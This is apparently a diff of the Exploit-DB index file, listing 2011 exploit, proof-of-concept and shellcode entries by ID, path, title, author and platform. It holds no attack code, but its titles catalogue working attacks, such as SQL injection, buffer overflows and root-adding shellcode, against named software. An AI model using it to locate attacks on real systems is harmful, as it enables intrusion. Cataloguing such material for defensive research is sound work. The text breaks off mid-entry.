17270,platforms/windows/local/17270.pl,"Chasys Media Player 2.0 - Buffer Overflow Exploit (SEH)",2011-05-11,h1ch4m,windows,local,0 +17277,platforms/windows/local/17277.pl,"A-PDF Wav to MP3 Converter 1.2.0 - DEP Bypass",2011-05-13,h1ch4m,windows,local,0 +17278,platforms/windows/dos/17278.pl,"Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC",2011-05-13,LiquidWorm,windows,dos,0 17273,platforms/windows/dos/17273.c,"Symantec Backup Exec System Recovery 8.5 - Kernel Pointers Dereferences (0day)",2011-05-12,"Stefan LE BERRE",windows,dos,0 17274,platforms/windows/dos/17274.txt,"SlimPDF Reader PoC",2011-05-12,"Nicolas Krassas",windows,dos,0 17275,platforms/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass",2011-05-12,h1ch4m,windows,local,0 17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0 -17277,platforms/windows/local/17277.pl,"A-PDF Wav to MP3 Converter 1.2.0 - DEP Bypass",2011-05-13,h1ch4m,windows,local,0 -17278,platforms/windows/dos/17278.pl,"Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC",2011-05-13,LiquidWorm,windows,dos,0 17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download Vulnerability",2011-05-13,LiquidWorm,hardware,remote,0 17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin (FCKeditor) 2.5 - Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0 17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability",2011-05-14,"Number 7",php,webapps,0 @@ -15006,9 +15042,9 @@ id,file,description,date,author,platform,type,port 17298,platforms/netware/dos/17298.txt,"Novell Netware eDirectory - DoS Vulnerability",2011-05-16,nSense,netware,dos,0 17299,platforms/php/webapps/17299.txt,"Wordpress Plugin Is-human <= 1.4.2- Remote Command Execution Vulnerability",2011-05-17,neworder,php,webapps,0 17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS <= 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow",2011-05-16,metasploit,windows,remote,0 -17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection Vulnerability",2011-05-17,Null-0x00,php,webapps,0 17302,platforms/windows/local/17302.py,"Sonique 1.96 - (.m3u) Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0 -17303,platforms/php/webapps/17303.txt,"Joomla 1.0 - Component jDownloads Arbitrary File Upload Vulnerability",2011-05-18,Al-Ghamdi,php,webapps,0 +17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection Vulnerability",2011-05-17,Null-0x00,php,webapps,0 +17303,platforms/php/webapps/17303.txt,"Joomla 1.0 Component jDownloads Arbitrary File Upload Vulnerability",2011-05-18,Al-Ghamdi,php,webapps,0 17304,platforms/windows/remote/17304.txt,"Cisco Unified Operations Manager Multiple Vulnerabilities",2011-05-18,"Sense of Security",windows,remote,0 17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/Server 2008 - ""nsiproxy.sys"" Local Kernel DoS Exploit",2011-05-18,"Lufeng Li",windows,dos,0 17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0 @@ -15020,13 +15056,10 @@ id,file,description,date,author,platform,type,port 17313,platforms/windows/local/17313.rb,"Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow",2011-05-22,metasploit,windows,local,0 17314,platforms/php/webapps/17314.txt,"vBulletin 4.0.x <= 4.1.2 - (search.php) SQL Injection Vulnerability",2011-05-23,D4rkB1t,php,webapps,0 17316,platforms/php/webapps/17316.txt,"PHPortfolio SQL Injection Vulnerbility",2011-05-23,lionaneesh,php,webapps,0 -17317,platforms/windows/local/17317.rb,"VisiWave VWR File Parsing Trusted Pointer Vulnerability",2011-05-23,metasploit,windows,local,0 -17318,platforms/multiple/local/17318.php,"PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability",2011-05-25,"Marek Kroemeke",multiple,local,0 -17319,platforms/php/webapps/17319.txt,"Tickets 2.13 SQL Injection Vulnerability",2011-05-25,"AutoSec Tools",php,webapps,0 17320,platforms/php/webapps/17320.txt,"i-doIT 0.9.9-4 - LFI Vulnerability",2011-05-25,"AutoSec Tools",php,webapps,0 17321,platforms/php/webapps/17321.txt,"ExtCalendar 2.0b2 (cal_search.php) SQL Injection Vulnerability",2011-05-25,"High-Tech Bridge SA",php,webapps,0 17322,platforms/php/webapps/17322.txt,"egroupware 1.8.001.20110421 - Multiple Vulnerabilities",2011-05-25,"AutoSec Tools",php,webapps,0 -17323,platforms/windows/shellcode/17323.c,"Allwin WinExec add new local administrator + ExitProcess Shellcode",2011-05-25,RubberDuck,windows,shellcode,0 +20195,platforms/lin_x86/shellcode/20195.c,"Linux x86 ASLR deactivation - 83 bytes",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 17324,platforms/php/webapps/17324.rb,"AWStats Totals <= 1.14 multisort - Remote Command Execution",2011-05-25,metasploit,php,webapps,0 17325,platforms/php/webapps/17325.py,"Clipbucket 2.4 RC2 645 SQL Injection Vulnerability",2011-05-26,"AutoSec Tools",php,webapps,0 17326,platforms/windows/shellcode/17326.rb,"DNS Reverse Download and Exec Shellcode",2011-05-26,"Alexey Sintsov",windows,shellcode,0 @@ -15036,12 +15069,12 @@ id,file,description,date,author,platform,type,port 17330,platforms/php/webapps/17330.html,"cPanel < 11.25 - CSRF - Add User php Script",2011-05-27,ninjashell,php,webapps,0 17335,platforms/php/webapps/17335.txt,"Duhok Forum 1.1 - SQL Injection Vulnerability",2011-05-28,M.Jock3R,php,webapps,0 17336,platforms/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection Vulnerability",2011-05-28,v3n0m,php,webapps,0 +17345,platforms/windows/remote/17345.py,"HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)",2011-05-29,fdisk,windows,remote,0 17338,platforms/php/webapps/17338.txt,"Joomla Component com_jmsfileseller Local File Inclusion Vulnerability",2011-05-28,Valentin,php,webapps,0 17339,platforms/windows/remote/17339.py,"HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055)",2011-05-28,fdisk,windows,remote,0 17341,platforms/php/webapps/17341.txt,"Joomla Component com_joomnik SQL Injection Vulnerability",2011-05-29,SOLVER,php,webapps,0 17343,platforms/php/webapps/17343.txt,"Puzzle Apps CMS 3.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps,0 17344,platforms/php/webapps/17344.txt,"Invisionix Roaming System Remote metasys 0.2 - LFI Vulnerability",2011-05-29,"Treasure Priyamal",php,webapps,0 -17345,platforms/windows/remote/17345.py,"HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)",2011-05-29,fdisk,windows,remote,0 17346,platforms/php/webapps/17346.php,"w-Agora Forum 4.2.1 - Arbitrary File Upload Exploit",2011-05-30,"Treasure Priyamal",php,webapps,0 17347,platforms/php/webapps/17347.php,"Easy Media Script SQL Injection Vulnerability",2011-05-30,Lagripe-Dz,php,webapps,0 17349,platforms/hardware/webapps/17349.txt,"Belkin G Wireless Router F5D7234-4 v5 Exploit",2011-05-30,Aodrulez,hardware,webapps,0 @@ -15052,6 +15085,7 @@ id,file,description,date,author,platform,type,port 17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Post-Authentication BoF",2011-06-01,b33f,windows,remote,0 17355,platforms/windows/remote/17355.rb,"GoldenFTP 4.70 PASS Stack Buffer Overflow",2011-06-02,metasploit,windows,remote,21 17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0 +18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow Vulnerability",2012-04-08,Vulnerability-Lab,windows,dos,0 17359,platforms/windows/remote/17359.pl,"Xitami Web Server 2.5b4 - Remote Buffer Overflow Exploit",2011-06-03,mr.pr0n,windows,remote,0 17360,platforms/windows/webapps/17360.txt,"WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Command Injection",2011-06-04,rgod,windows,webapps,0 17361,platforms/windows/remote/17361.py,"Xitami Web Server 2.5b4 - Remote Buffer Overflow (Egghunter)",2011-06-04,"Glafkos Charalambous ",windows,remote,0 @@ -15062,8 +15096,8 @@ id,file,description,date,author,platform,type,port 17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute",2011-06-06,metasploit,windows,remote,0 17367,platforms/php/webapps/17367.html,"Dataface Local File Include",2011-06-07,ITSecTeam,php,webapps,0 17371,platforms/linux/shellcode/17371.txt,"Linux/x86-32 - ConnectBack with SSL connection - 422 bytes",2011-06-08,"Jonathan Salwan",linux,shellcode,0 -17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF playlist parser",2011-06-08,TecR0c,windows,dos,0 17373,platforms/windows/remote/17373.py,"ActFax Server FTP Remote BoF (post auth) Bigger Buffer",2011-06-08,b33f,windows,remote,0 +17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF playlist parser",2011-06-08,TecR0c,windows,dos,0 17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,metasploit,windows,remote,0 17375,platforms/asp/webapps/17375.txt,"EquiPCS SQL Injection Vulnerability Exploit",2011-06-09,Sideswipe,asp,webapps,0 17376,platforms/hardware/webapps/17376.txt,"Aastra IP Phone 9480i Web Interface Data disclosure Vulnerability",2011-06-09,"Yakir Wizman",hardware,webapps,0 @@ -15074,6 +15108,8 @@ id,file,description,date,author,platform,type,port 17381,platforms/windows/remote/17381.txt,"simple web-server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0 17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0 17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Win7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0 +17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow",2011-06-27,metasploit,windows,remote,0 +17455,platforms/windows/dos/17455.rb,"Smallftpd 1.0.3 FTP Server Denial of Service Vulnerability",2011-06-27,"Myo Soe",windows,dos,0 17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow Vulnerability",2011-06-11,huimaozi,windows,dos,0 17388,platforms/windows/webapps/17388.txt,"trend micro data loss prevention virtual appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0 17389,platforms/php/webapps/17389.py,"Technote 7.2 - Blind SQL Injection Vulnerability",2011-06-11,BlueH4G,php,webapps,0 @@ -15113,28 +15149,24 @@ id,file,description,date,author,platform,type,port 17428,platforms/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities",2011-06-22,"Brendan Coles",php,webapps,0 17429,platforms/windows/remote/17429.rb,"FactoryLink vrn.exe - Opcode 9 Buffer Overflow",2011-06-21,metasploit,windows,remote,0 17430,platforms/windows/remote/17430.rb,"Sielco Sistemi Winlog Buffer Overflow",2011-06-21,metasploit,windows,remote,0 -17431,platforms/php/webapps/17431.txt,"Same Team E-shop manager - SQL Injection Exploit",2011-06-22,"Number 7",php,webapps,0 -17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH - sh4 - setuid(0) - chmod(""/etc/shadow"", 0666) - exit(0) - 43 bytes",2011-06-22,"Jonathan Salwan",sh4,shellcode,0 17434,platforms/windows/remote/17434.rb,"RealWin SCADA Server DATAC Login Buffer Overflow",2011-06-22,metasploit,windows,remote,0 17435,platforms/php/webapps/17435.txt,"brewblogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0 17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection Vulnerability",2011-06-23,"Brendan Coles",php,webapps,0 17437,platforms/jsp/webapps/17437.txt,"manageengine service desk plus 8.0 - Directory Traversal Vulnerability",2011-06-23,"Keith Lee",jsp,webapps,0 17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0 17439,platforms/sh4/shellcode/17439.c,"SuperH (sh4) Add root user with password",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 -17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - (.fat) Buffer Overflow Exploit",2011-06-23,"Ivn Garca Ferreira",windows,local,0 +17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - (.fat) Buffer Overflow Exploit",2011-06-23,"Iván García Ferreira",windows,local,0 17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build <= 7801 - Directory Traversal Vulnerability",2011-06-23,xistence,jsp,webapps,0 17443,platforms/cgi/webapps/17443.txt,"ActivDesk 3.0 - Multiple security vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps,0 17444,platforms/php/webapps/17444.txt,"Webcat Multiple Blind SQL Injection Vulnerabilities",2011-06-23,w0rd,php,webapps,0 17445,platforms/php/webapps/17445.txt,"2Point Solutions (cmspages.php) SQL Injection Vulnerability",2011-06-23,"Newbie Campuz",php,webapps,0 17446,platforms/php/webapps/17446.txt,"nodesforum 1.059 - Remote File Inclusion Vulnerability",2011-06-23,bd0rk,php,webapps,0 -17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)",2011-06-23,metasploit,windows,remote,0 17449,platforms/windows/local/17449.py,"FreeAmp 2.0.7 - (.pls) Buffer Overflow Exploit",2011-06-24,"C4SS!0 G0M3S",windows,local,0 17450,platforms/windows/remote/17450.rb,"Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",2011-06-25,metasploit,windows,remote,0 +17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)",2011-06-23,metasploit,windows,remote,0 17451,platforms/windows/local/17451.rb,"Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability",2011-06-26,metasploit,windows,local,0 17452,platforms/php/webapps/17452.txt,"JoomlaXi Persistent XSS Vulnerability",2011-06-26,"Karthik R",php,webapps,0 17453,platforms/php/webapps/17453.txt,"Wordpress Beer Recipes Plugin 1.0 - XSS",2011-06-26,TheUzuki.',php,webapps,0 -17455,platforms/windows/dos/17455.rb,"Smallftpd 1.0.3 FTP Server Denial of Service Vulnerability",2011-06-27,"Myo Soe",windows,dos,0 -17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow",2011-06-27,metasploit,windows,remote,0 17457,platforms/php/webapps/17457.txt,"rgboard 4.2.1 - SQL Injection Vulnerability",2011-06-28,hamt0ry,php,webapps,0 17458,platforms/windows/dos/17458.txt,"HP Data Protector 6.20 - Multiple Vulnerabilities",2011-06-29,"Core Security",windows,dos,0 17459,platforms/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Local Privilege Escalation",2011-06-29,LiquidWorm,windows,local,0 @@ -15167,9 +15199,10 @@ id,file,description,date,author,platform,type,port 17488,platforms/windows/local/17488.txt,"Adobe Reader 5.1 XFDF Buffer Overflow Vulnerability (SEH)",2011-07-04,extraexploit,windows,local,0 17489,platforms/windows/local/17489.rb,"Word List Builder 1.0 - Buffer Overflow Exploit (MSF)",2011-07-04,"James Fitts",windows,local,0 17490,platforms/windows/remote/17490.rb,"HP OmniInet.exe Opcode 20 - Buffer Overflow",2011-07-04,metasploit,windows,remote,0 -17491,platforms/unix/remote/17491.rb,"VSFTPD 2.3.4 - Backdoor Command Execution",2011-07-05,metasploit,unix,remote,0 17492,platforms/windows/local/17492.rb,"Wordtrainer 3.0 - (.ord) Buffer Overflow Vulnerability (MSF)",2011-07-05,"James Fitts",windows,local,0 +17491,platforms/unix/remote/17491.rb,"VSFTPD 2.3.4 - Backdoor Command Execution",2011-07-05,metasploit,unix,remote,0 17493,platforms/asp/webapps/17493.txt,"DmxReady Secure Document Library 1.2 - SQL Injection Vulnerability",2011-07-05,Bellatrix,asp,webapps,0 +17509,platforms/windows/dos/17509.pl,"ZipWiz 2005 5.0 - (.zip) Buffer Corruption Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 17495,platforms/php/webapps/17495.txt,"BbZL.PhP File Inclusion Exploit",2011-07-06,"Number 7",php,webapps,0 17496,platforms/php/webapps/17496.txt,"Joomla 1.6.3 - CSRF Exploit",2011-07-06,"Luis Santana",php,webapps,0 17497,platforms/windows/dos/17497.txt,"ESTsoft ALPlayer 2.0 ASX Playlist File Handling Buffer Overflow Vulnerability",2011-07-06,LiquidWorm,windows,dos,0 @@ -15181,7 +15214,6 @@ id,file,description,date,author,platform,type,port 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal Vulnerability",2011-07-08,"SecPod Research",hardware,remote,0 17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - XSS Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0 -17509,platforms/windows/dos/17509.pl,"ZipWiz 2005 5.0 - (.zip) Buffer Corruption Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) Remote Code Execution Exploit",2011-07-08,wofeiwo,php,webapps,0 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - (.ZIP) Buffer Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,local,0 17512,platforms/windows/dos/17512.pl,"ZipItFast 3.0 - (.ZIP) Heap Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 @@ -15211,13 +15243,13 @@ id,file,description,date,author,platform,type,port 17543,platforms/windows/remote/17543.rb,"Iconics GENESIS32 9.21.201.01 - Integer Overflow",2011-07-17,metasploit,windows,remote,0 17544,platforms/windows/dos/17544.txt,"GDI+ CreateDashedPath Integer Overflow in gdiplus.dll",2011-07-18,Abysssec,windows,dos,0 17545,platforms/win32/shellcode/17545.txt,"win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes",2011-07-18,KaHPeSeSe,win32,shellcode,0 -17546,platforms/windows/remote/17546.py,"FreeFloat FTP Server 1.0 - REST, PASV Buffer Overflow Exploit",2011-07-18,"C4SS!0 G0M3S",windows,remote,0 -17548,platforms/windows/remote/17548.rb,"FreeFloat FTP Server REST Buffer Overflow (MSF)",2011-07-19,KaHPeSeSe,windows,remote,0 -17549,platforms/multiple/dos/17549.txt,"Lotus Domino SMTP router, EMAIL server and client DoS",2011-07-19,Unknown,multiple,dos,0 -17550,platforms/windows/remote/17550.py,"FreeFloat FTP Server 1.0 - ACCL Buffer Overflow Exploit",2011-07-19,mortis,windows,remote,0 -17551,platforms/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Stored XSS Vulnerability",2011-07-20,"Sense of Security",jsp,webapps,0 +17546,platforms/windows/remote/17546.py,"FreeFloat FTP Server 1.0 - REST & PASV Buffer Overflow Exploit",2011-07-18,"C4SS!0 G0M3S",windows,remote,0 17553,platforms/php/webapps/17553.txt,"Appointment Booking Pro Joomla Component LFI Vulnerability",2011-07-20,"Don Tukulesto",php,webapps,0 17554,platforms/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - CSRF Vulnerabilities",2011-07-21,Crazy_Hacker,php,webapps,0 +17548,platforms/windows/remote/17548.rb,"FreeFloat FTP Server REST Buffer Overflow (MSF)",2011-07-19,KaHPeSeSe,windows,remote,0 +17549,platforms/multiple/dos/17549.txt,"Lotus Domino SMTP Router & Email Server and Client - DoS",2011-07-19,Unknown,multiple,dos,0 +17550,platforms/windows/remote/17550.py,"FreeFloat FTP Server 1.0 - ACCL Buffer Overflow Exploit",2011-07-19,mortis,windows,remote,0 +17551,platforms/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Stored XSS Vulnerability",2011-07-20,"Sense of Security",jsp,webapps,0 17555,platforms/php/webapps/17555.txt,"Vbulletin 4.0.x <= 4.1.3 - (messagegroupid) SQL Injection Vulnerability (0day)",2011-07-21,fb1h2s,php,webapps,0 17556,platforms/php/webapps/17556.txt,"Joomla Component JE K2 Story Submit Local File Inclusion Vulnerability",2011-07-21,v3n0m,php,webapps,0 17557,platforms/windows/remote/17557.html,"Dell IT Assistant - detectIESettingsForITA.ocx ActiveX Control",2011-07-21,rgod,windows,remote,0 @@ -15228,13 +15260,13 @@ id,file,description,date,author,platform,type,port 17563,platforms/windows/local/17563.py,"Download Accelerator plus (DAP) 9.7 - M3U File Buffer Overflow Exploit (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0 17564,platforms/osx/shellcode/17564.asm,"OSX universal ROP shellcode",2011-07-24,pa_kt,osx,shellcode,0 17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - m3u Buffer Overflow Exploit (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0 +17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0 17567,platforms/osx/dos/17567.txt,"Safari SVG DOM processing PoC",2011-07-25,"Nikita Tarakanov",osx,dos,0 17569,platforms/windows/dos/17569.py,"Ciscokits 1.0 - TFTP Server File Name DoS",2011-07-25,"Craig Freyman",windows,dos,0 17570,platforms/php/webapps/17570.txt,"Musicbox <= 3.7 - Multiple Vulnerabilites",2011-07-25,R@1D3N,php,webapps,0 17571,platforms/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 - Cross-Site Request Forgery",2011-07-26,"Narendra Shinde",php,webapps,0 17572,platforms/multiple/webapps/17572.txt,"ManageEngine ServiceDesk Plus 8.0.0 Build 8013 Improper User Privileges",2011-07-26,"Narendra Shinde",multiple,webapps,0 17573,platforms/php/webapps/17573.txt,"PHP-Barcode 0.3pl1 - Remote Code Execution",2011-07-26,beford,php,webapps,0 -17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0 17575,platforms/windows/remote/17575.txt,"Safari 5.0.5 SVG Remote Code Execution Exploit (DEP bypass)",2011-07-26,Abysssec,windows,remote,0 17577,platforms/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool Cross-Site Request Forgery PoC",2011-07-27,"Narendra Shinde",cgi,webapps,0 17578,platforms/windows/remote/17578.txt,"MinaliC Webserver 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,windows,remote,0 @@ -15251,8 +15283,8 @@ id,file,description,date,author,platform,type,port 17591,platforms/php/webapps/17591.txt,"Joomla Component (com_obSuggest) Local File Inclusion Vulnerability",2011-07-31,v3n0m,php,webapps,0 17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 - CSRF Vulnerability",2011-08-01,Xadpritox,php,webapps,0 17593,platforms/php/webapps/17593.txt,"Zoneminder 1.24.3 - Remote File Inclusion Vulnerability",2011-08-01,iye,php,webapps,0 -17594,platforms/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC Credential Information Disclosure",2011-08-01,metasploit,jsp,webapps,0 17595,platforms/php/webapps/17595.txt,"MyBB MyTabs (plugin) - SQL Injection Vulnerability (0day)",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 +17594,platforms/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC Credential Information Disclosure",2011-08-01,metasploit,jsp,webapps,0 17597,platforms/php/webapps/17597.txt,"SiteGenius Blind SQL Injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - (.pls) Buffer Overflow Vulnerability (DEP BYPASS)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0 17601,platforms/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server DoS",2011-08-03,"Craig Freyman",windows,dos,0 @@ -15273,6 +15305,7 @@ id,file,description,date,author,platform,type,port 17618,platforms/windows/dos/17618.py,"CiscoKits 1.0 - TFTP Server DoS (Write command)",2011-08-05,"SecPod Research",windows,dos,0 17619,platforms/windows/remote/17619.py,"CiscoKits 1.0 - TFTP Server Directory Traversal Vulnerability",2011-08-05,"SecPod Research",windows,remote,0 17620,platforms/windows/dos/17620.txt,"threedify designer 5.0.2 - Multiple Vulnerabilities",2011-08-05,"High-Tech Bridge SA",windows,dos,0 +17637,platforms/php/webapps/17637.txt,"Simple Machines forum (SMF) 2.0 session hijacking",2011-08-07,seth,php,webapps,0 17626,platforms/windows/remote/17626.rb,"PXE Exploit server",2011-08-05,metasploit,windows,remote,0 17627,platforms/php/webapps/17627.txt,"WordPress UPM Polls plugin <= 1.0.3 - SQL Injection Vulnerability",2011-08-06,"Miroslav Stampar",php,webapps,0 17628,platforms/php/webapps/17628.txt,"WordPress Media Library Categories plugin <= 1.0.6 - SQL Injection Vulnerability",2011-08-06,"Miroslav Stampar",php,webapps,0 @@ -15283,7 +15316,6 @@ id,file,description,date,author,platform,type,port 17634,platforms/windows/local/17634.pl,"Free CD to MP3 Converter 3.1 - Universal DEP Bypass Exploit",2011-08-07,"C4SS!0 G0M3S",windows,local,0 17635,platforms/hardware/remote/17635.rb,"HP JetDirect PJL Interface Universal Path Traversal",2011-08-07,"Myo Soe",hardware,remote,0 17636,platforms/hardware/remote/17636.rb,"HP JetDirect PJL Query Execution",2011-08-07,"Myo Soe",hardware,remote,0 -17637,platforms/php/webapps/17637.txt,"Simple Machines forum (SMF) 2.0 session hijacking",2011-08-07,seth,php,webapps,0 17638,platforms/windows/dos/17638.py,"LiteServe 2.81 PASV Command Denial of Service",2011-08-08,"Craig Freyman",windows,dos,0 17639,platforms/php/webapps/17639.txt,"XpressEngine 1.4.5.7 Persistent XSS Vulnerability",2011-08-08,v0nSch3lling,php,webapps,0 17640,platforms/php/webapps/17640.txt,"BlogPHP 2.0 - Persistent XSS Vulnerability",2011-08-09,Paulzz,php,webapps,0 @@ -15300,17 +15332,17 @@ id,file,description,date,author,platform,type,port 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0 17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0 +17665,platforms/windows/local/17665.pl,"D.R. Software Audio Converter 8.1 - DEP Bypass Exploit",2011-08-13,"C4SS!0 G0M3S",windows,local,0 17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 - Denial of Servive Exploit",2011-08-12,G13,windows,dos,0 +17666,platforms/php/webapps/17666.txt,"Prediction Football 2.51 XRF / CSRF",2011-08-14,"Smith Falcon",php,webapps,0 17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)",2011-08-13,metasploit,windows,remote,0 17660,platforms/php/webapps/17660.txt,"videoDB <= 3.1.0 - SQL Injection Vulnerability",2011-08-13,seceurityoverun,php,webapps,0 17661,platforms/php/webapps/17661.txt,"Kahf Poems 1.0 - Multiple Vulnerabilities",2011-08-13,"Yassin Aboukir",php,webapps,0 17662,platforms/php/webapps/17662.txt,"Mambo CMS 4.6.x (4.6.5) SQL Injection Vulnerability",2011-08-13,"Aung Khant",php,webapps,0 +17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0 17664,platforms/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow Vulnerability",2011-08-13,wh1ant,windows,dos,0 -17665,platforms/windows/local/17665.pl,"D.R. Software Audio Converter 8.1 - DEP Bypass Exploit",2011-08-13,"C4SS!0 G0M3S",windows,local,0 -17666,platforms/php/webapps/17666.txt,"Prediction Football 2.51 XRF / CSRF",2011-08-14,"Smith Falcon",php,webapps,0 17667,platforms/php/webapps/17667.php,"Contrexx Shopsystem <= 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0 17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability",2011-08-15,nion,windows,remote,0 -17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0 17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)",2011-08-16,mr_me,windows,remote,0 17673,platforms/php/webapps/17673.txt,"WordPress IP-Logger Plugin <= 3.0 - SQL Injection Vulnerability",2011-08-16,"Miroslav Stampar",php,webapps,0 17674,platforms/php/webapps/17674.txt,"Joomla JoomTouch Component Local File Inclusion 